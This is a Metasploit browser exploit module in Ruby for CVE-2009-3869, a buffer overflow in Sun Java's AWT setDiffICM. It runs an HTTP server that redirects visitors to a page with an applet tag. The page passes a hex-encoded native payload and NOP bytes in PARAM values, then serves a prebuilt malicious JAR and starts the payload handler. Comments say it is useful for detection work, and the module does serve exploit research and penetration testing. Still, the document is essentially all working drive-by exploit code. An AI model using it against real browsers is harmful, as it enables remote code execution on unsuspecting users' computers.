##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
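# Browser exploit module for CVE-2009-3869 (Sun JRE AWT setDiffICM).
#
# What this class actually does on the wire (useful when writing detections
# or reviewing the module):
#   * #exploit preloads a prebuilt archive from data/exploits/CVE-2009-3869.jar
#     and then starts the HTTP server.
#   * A request that does not end in ".jar" is redirected to a "/"-terminated
#     path and then answered with a small HTML page whose <applet> tag names a
#     random 32-character ".jar" archive and carries the hex-encoded payload in
#     the 'sc' PARAM and a four-byte NOP value in the 'np' PARAM.
#   * A request ending in ".jar" is answered with the preloaded archive as
#     application/octet-stream, after which the payload handler is started.
# Both responses are sent with "Pragma: no-cache".
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  # Module metadata.
  #
  # The Targets list holds three fixed platform/arch entries (indices 0..2).
  # The 'Automatic' entry is kept in a =begin/=end block, so target.name never
  # matches /Automatic/ and the User-Agent based branches in #on_request_uri
  # and #generate_applet are currently dormant.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sun Java JRE AWT setDiffICM Buffer Overflow',
        'Description' => %q{
          This module exploits a flaw in the setDiffICM function in the Sun JVM.

          The payload is serialized and passed to the applet via PARAM tags. It must be
          a native payload.

          The effected Java versions are JDK and JRE 6 Update 16 and earlier,
          JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and
          earlier, and SDK and JRE 1.3.1_26 and earlier.

          NOTE: Although all of the above versions are reportedly vulnerable, only
          1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'jduck'
        ],
        'References' => [
          [ 'CVE', '2009-3869' ],
          [ 'OSVDB', '59710' ],
          [ 'BID', '36881' ],
          [ 'ZDI', '09-078' ]
        ],
        'Payload' => {
          'Space' => 1024,
          'BadChars' => '',
          'DisableNops' => true
        },
        'Targets' => [
=begin

          No automatic targetting for now ...

          [ 'J2SE 1.6_16 Automatic',
            {
              'Platform' => %w{ linux osx win },
              'Arch' => [ARCH_X86, ARCH_PPC]
            }
          ],

=end
          [
            'J2SE 1.6_16 on Windows x86',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ],
          [
            'J2SE 1.6_16 on Mac OS X PPC',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC
            }
          ],
          [
            'J2SE 1.6_16 on Mac OS X x86',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2009-11-04',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Handles every request that reaches the module's resource.
  #
  # Non-".jar" URIs receive the applet-loader HTML (after a redirect to a
  # "/"-terminated path so the relative archive name resolves); ".jar" URIs
  # receive the archive loaded in #exploit, followed by a call to the payload
  # handler. A per-client cache keyed by peer address records the last-seen
  # time and, when an 'Automatic' target is active, the detected target.
  #
  # @param cli the client connection; cli.peerhost keys the target cache
  # @param req the parsed HTTP request (uri and headers are read)
  # @return [void]
  def on_request_uri(cli, req)
    # Create a cached mapping between IP and detected target
    @targetcache ||= {}
    @targetcache[cli.peerhost] ||= {}
    @targetcache[cli.peerhost][:update] = Time.now.to_i

    # Dormant while no 'Automatic' target is defined. The indices 1..3
    # presumably assume the commented-out Automatic entry occupies index 0;
    # the current Targets list only has indices 0..2, so this mapping must be
    # re-checked before that entry is ever re-enabled.
    if (target.name =~ /Automatic/)
      case req.headers['User-Agent']
      when /Windows/i
        print_status('Choosing a Windows target')
        @targetcache[cli.peerhost][:target] = targets[1]
      when /PPC Mac OS X/i
        print_status('Choosing a Mac OS X PPC target')
        @targetcache[cli.peerhost][:target] = targets[2]
      when /Intel Mac OS X/i
        print_status('Choosing a Mac OS X x86 target')
        @targetcache[cli.peerhost][:target] = targets[3]
      else
        print_status("Unknown target for: #{req.headers['User-Agent']}")
      end
    end

    # Clean the cache: drop every client not seen within the last 60 seconds.
    # The timestamp is taken once rather than per entry.
    now = Time.now.to_i
    @targetcache.delete_if { |_addr, entry| now > entry[:update] + 60 }

    # Request processing
    unless req.uri.match?(/\.jar$/i)
      # Redirect to the base directory so the applet code loads...
      unless req.uri.match?(%r{/$})
        print_status('Sending redirect so path ends with / ...')
        send_redirect(cli, get_resource + '/', '')
        return
      end

      # Display the applet loading HTML
      print_status('Sending HTML')
      send_response_html(cli, generate_html(payload.encoded),
                         {
                           'Content-Type' => 'text/html',
                           'Pragma' => 'no-cache'
                         })
      return
    end

    # Send the actual applet over
    print_status('Sending applet')
    send_response(cli, generate_applet(cli, req),
                  {
                    'Content-Type' => 'application/octet-stream',
                    'Pragma' => 'no-cache'
                  })

    # Handle the payload
    handler(cli)
  end

  # Builds the applet-loader page.
  #
  # The template's JARNAME placeholder becomes a random alphanumeric archive
  # name, SCODE becomes the hex encoding of the payload padded to a multiple
  # of four bytes, and NOPS becomes the hex encoding of four 0x90 bytes.
  # Those two PARAM values are the only payload-bearing content in the page,
  # which is what a content inspector would key on.
  #
  # @param pl [String] the encoded native payload bytes
  # @return [String] the finished HTML document
  def generate_html(pl)
    html = <<~EOF
      <html>
      <head>
      <!-- <meta http-equiv=refresh content=10 /> -->
      </head>
      <body>
      <applet width='100%' height='100%' code='AppletX' archive='JARNAME'>
      <param name='sc' value='SCODE' />
      <param name='np' value='NOPS' />
      </applet>
      </body>
      </html>
    EOF
    # finalize html
    jar_name = rand_text_alphanumeric(32) + '.jar'
    html.gsub!(/JARNAME/, jar_name)

    # put payload into html
    # debug_payload is a compile-time switch: when true a 0xcc (int3) byte is
    # prepended and a hex dump is printed; it is false here, so both branches
    # below are skipped.
    debug_payload = false
    pload = ''
    pload << "\xcc" if debug_payload
    pload << pl
    # pad to a 4-byte boundary with random bytes
    if ((pload.length % 4) > 0)
      pload << rand_text((4 - (pload.length % 4)))
    end
    if debug_payload
      print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))
    end
    html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))

    # put nops into html
    nops = "\x90\x90\x90\x90"
    html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))
    # print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))

    html
  end

  # Loads the prebuilt applet archive into memory, then starts the HTTP
  # server via super.
  #
  # File.binread reads the whole file in binary mode and always closes the
  # descriptor; the previous File.open / read / close sequence leaked the
  # handle if the read raised.
  #
  # @raise [Errno::ENOENT] if the archive is missing from the data directory
  def exploit
    path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2009-3869.jar')
    @jar_data = File.binread(path)

    super
  end

  # Returns the archive bytes to serve for a ".jar" request.
  #
  # The only case that does not return the archive is an active 'Automatic'
  # target for which #on_request_uri recorded no target for this client; the
  # response body is then empty. With the current fixed targets the archive
  # is always returned.
  #
  # @param cli the client connection (its peerhost is looked up in the cache)
  # @param _req unused
  # @return [String] the archive bytes, or '' when no target was detected
  def generate_applet(cli, _req)
    if target.name =~ /Automatic/ && !@targetcache[cli.peerhost][:target]
      return ''
    end

    @jar_data
  end
end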